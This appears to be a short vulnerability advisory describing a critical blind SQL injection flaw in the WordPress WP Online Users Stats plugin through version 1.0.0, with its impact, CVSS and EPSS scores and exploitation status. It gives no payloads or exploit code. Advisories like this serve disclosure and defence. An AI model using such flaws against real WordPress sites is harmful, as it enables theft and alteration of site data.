This vulnerability is an instance of improper neutralization of special elements in an SQL command, allowing an attacker to perform blind SQL injection against the WordPress WP Online Users Stats plugin. The flaw can enable the attacker to read, modify, or delete database records, including sensitive user data, thereby compromising confidentiality, integrity, and potentially allowing further exploitation. Remote code execution is inferred but not confirmed by the CVE description.

The WP Online Users Stats plugin by HK is impacted for all released versions through version 1.0.0. Users who have not upgraded beyond this version should recognize that any Wordpress installation containing this plugin is vulnerable, regardless of the underlying WordPress core version.

With a CVSS score of 9.3 the risk is classified as critical. The EPSS score of less than 1% indicates that the probability of exploitation in the wild is currently low, and the vulnerability is not yet listed in the CISA Known Exploited Vulnerabilities catalog. Based on the description, it is inferred that the attack vector is web-based, requiring the attacker to craft malicious input that is processed by the plugin’s database queries. Successful exploitation would allow the attacker to exfiltrate data or modify site content, and could form a foothold for further attacks.